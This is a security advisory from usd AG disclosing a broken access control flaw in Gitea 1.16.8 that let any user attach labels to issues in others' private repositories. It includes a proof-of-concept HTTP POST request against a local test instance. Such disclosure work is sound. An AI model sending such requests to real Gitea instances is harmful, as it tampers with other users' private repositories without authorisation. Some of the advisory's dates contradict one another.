usd-2022-0026 | Broken Access Control in Gitea Issue Labels
Advisory ID: usd-2022-0026
Product: Gitea
Affected Version: 1.16.8
Vulnerability Type: https://cwe.mitre.org/data/definitions/284.html
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: Not published yet
Last Update: 2022-06-30
Introduction
Gitea allows users to add labels to issues. Due to improper access control, it is possible for any user to add labels to any issue.
Proof of Concept
Issue labels can be attached to issues that you should not be able to access.
The issue_id 7 in the example below is an issue of a private repository of another user.
The 4091 is the label id. The label must be exist in the target repository.
POST /testuser/test222/issues/labels HTTP/1.1 Host: localhost:3000 Content-Length: 94 sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99" Accept:*\*/\** Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: [http://localhost:3000]() Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: XXX Connection: close _csrf=rmB[...]&action=attach&issue_ids=7&id=4091
Fix
It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.
References
Timeline
- 2022-06-22: vulnerability identified by Christian Pöschl
- 2022-06-22: First contact request
- 2022-07-01: Investigation started by vendor
- 2022-07-15: Vendor confirms remediation
- 2024-05-29: This advisory is published
Credits
This security vulnerability was identified by Christian Pöschl of usd AG.
%